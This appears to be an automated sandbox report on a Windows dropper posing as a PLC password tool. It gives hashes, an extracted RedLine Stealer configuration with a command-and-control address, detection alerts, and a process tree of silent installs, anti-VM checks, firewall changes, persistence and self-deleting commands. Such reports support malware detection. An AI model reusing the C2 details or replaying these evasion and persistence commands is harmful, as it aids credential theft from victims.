Analysis
-
max time kernel
258s -
max time network
259s -
platform
windows10-2004_x64 -
resource
win10v2004-20220715-en -
resource tags
-
submitted
16-07-2022 05:47
General
-
Target
plc-password-setup-t_rCqyQfiI.exe
-
Size
6.2MB
-
MD5
7250e3da80e7072cea98e23fe4041345
-
SHA1
f9853b72781bc82d6508ac978503ffdfa104b419
-
SHA256
7e1616589594ae5c4303abd3ebf73dbe38b7b3b454690670ddaba11530ab4bd8
-
SHA512
bbf776d9183315a721455dab747c3daf3be1b4ded5d018642c131f9770a9beffdaeaa30fd801100f7ae6086d7417240f6e1171944bb115e7fd86590e8638de63
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
mixbasic1
C2
185.215.113.70:21508
Attributes
-
auth_value
b5b7790c71797786dfd950545c81e9fa
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
-
suricata: ET MALWARE AutoHotkey Downloader Checkin via IPLogger
suricata: ET MALWARE AutoHotkey Downloader Checkin via IPLogger
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 7 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks for any installed AV software in registry 1 TTPs 10 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Drops Chrome extension 2 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 48 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 10 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 64 IoCs
-
Checks SCSI registry key(s) 3 TTPs 41 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 7 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 6 IoCs
-
Modifies system certificate store 2 TTPs 16 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 37 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\plc-password-setup-t_rCqyQfiI.exe"C:\Users\Admin\AppData\Local\Temp\plc-password-setup-t_rCqyQfiI.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-DFE9O.tmp\is-G18US.tmp"C:\Users\Admin\AppData\Local\Temp\is-DFE9O.tmp\is-G18US.tmp" /SL4 $8003E "C:\Users\Admin\AppData\Local\Temp\plc-password-setup-t_rCqyQfiI.exe" 6191787 4203522⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵
-
C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\Adw.exe"C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\Adw.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 10124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 10364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 12164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1404⤵
- Program crash
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Adw 6.0.2.1"3⤵
-
C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\Adw.exe"C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\Adw.exe" e7893e073614e30c5434c456745a8b563⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 9964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 10044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 10084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 12044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 12124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 12964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 13004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 13844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 13924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 13844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 11164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 13484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 15284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 13524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 18724⤵
- Program crash
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://totrakto.com/plc-password-crack-tool-free-download.zip4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff9180746f8,0x7ff918074708,0x7ff9180747185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5260 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5320 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3296 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff785ed5460,0x7ff785ed5470,0x7ff785ed54806⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3296 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 15084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 15524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 15364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 18084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 18724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19644⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19644⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19884⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1JB7xK9f\905u0rYnoRp85vL3.exeC:\Users\Admin\AppData\Local\Temp\1JB7xK9f\905u0rYnoRp85vL3.exe /VERYSILENT4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-6Q0I6.tmp\905u0rYnoRp85vL3.tmp"C:\Users\Admin\AppData\Local\Temp\is-6Q0I6.tmp\905u0rYnoRp85vL3.tmp" /SL5="$6027C,4843834,780800,C:\Users\Admin\AppData\Local\Temp\1JB7xK9f\905u0rYnoRp85vL3.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Proxy2Service\client.exe"C:\Program Files (x86)\Proxy2Service\client.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\m3nUjKTQ\sPc0vDiz.exeC:\Users\Admin\AppData\Local\Temp\m3nUjKTQ\sPc0vDiz.exe4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 20964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 21604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 22044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 21044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 22084⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1wcBu1A2\WFOiZtxlH5En8g90.exeC:\Users\Admin\AppData\Local\Temp\1wcBu1A2\WFOiZtxlH5En8g90.exe /silentmix SUB=e7893e073614e30c5434c456745a8b564⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-JOSH9.tmp\is-ROOK1.tmp"C:\Users\Admin\AppData\Local\Temp\is-JOSH9.tmp\is-ROOK1.tmp" /SL4 $B027A "C:\Users\Admin\AppData\Local\Temp\1wcBu1A2\WFOiZtxlH5En8g90.exe" 5765103 52736 /silentmix SUB=e7893e073614e30c5434c456745a8b565⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Program Files (x86)\agSearcher\nsearcher.exe"C:\Program Files (x86)\agSearcher\nsearcher.exe" /silentmix SUB=e7893e073614e30c5434c456745a8b566⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\7INVNY\ZZBe6j.exe"C:\Users\Admin\AppData\Roaming\7INVNY\ZZBe6j.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 10448⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\zmjsXew1J6K\AewupLCiG.exe"C:\Users\Admin\AppData\Roaming\zmjsXew1J6K\AewupLCiG.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\3CB09A926058773E\tomtit.exe8⤵
-
C:\Users\Admin\AppData\Roaming\3CB09A926058773E\tomtit.exeC:\Users\Admin\AppData\Roaming\3CB09A926058773E\tomtit.exe9⤵
-
C:\Users\Admin\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe"C:\Users\Admin\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout -t 3 && del "C:\Users\Admin\AppData\Roaming\zmjsXew1J6K\AewupLCiG.exe"8⤵
-
C:\Windows\SysWOW64\timeout.exetimeout -t 39⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\FGVh2Xti\Tryam.exe"C:\Users\Admin\AppData\Roaming\FGVh2Xti\Tryam.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\shftools\strongix.exestrongix.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\shftools\strongix.exe"C:\Users\Admin\AppData\Roaming\shftools\strongix.exe"9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\z3FMtLuD2VOh1A1QuTrbf\Cleaner.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\z3FMtLuD2VOh1A1QuTrbf\Cleaner.exe"C:\Users\Admin\AppData\Local\Temp\z3FMtLuD2VOh1A1QuTrbf\Cleaner.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nsearcher.exe" /f & erase "C:\Program Files (x86)\agSearcher\nsearcher.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nsearcher.exe" /f8⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\Bb4isgTL\y6OyeWm2.exeC:\Users\Admin\AppData\Local\Temp\Bb4isgTL\y6OyeWm2.exe /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=721..e7893e073614e30c5434c456745a8b564⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-4FQ4S.tmp\y6OyeWm2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4FQ4S.tmp\y6OyeWm2.tmp" /SL5="$4028E,11375691,791040,C:\Users\Admin\AppData\Local\Temp\Bb4isgTL\y6OyeWm2.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=721..e7893e073614e30c5434c456745a8b565⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\Programs\Adblock\Adblock.exe"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=3d049c101657957753 --downloadDate=2022-07-16T07:49:06 --distId=marketator --pid=721..e7893e073614e30c5434c456745a8b566⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Programs\Adblock\crashpad_handler.exeC:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\17d2b04b-a7e0-4818-ef9b-4aafdcd24d20.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\17d2b04b-a7e0-4818-ef9b-4aafdcd24d20.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\17d2b04b-a7e0-4818-ef9b-4aafdcd24d20.run\__sentry-breadcrumb2" --initial-client-data=0x48c,0x490,0x494,0x468,0x498,0x7ff7a051f8e0,0x7ff7a051f900,0x7ff7a051f9187⤵
- Executes dropped EXE
-
C:\Windows\system32\netsh.exeC:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE7⤵
- Modifies Windows Firewall
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -install7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -start7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
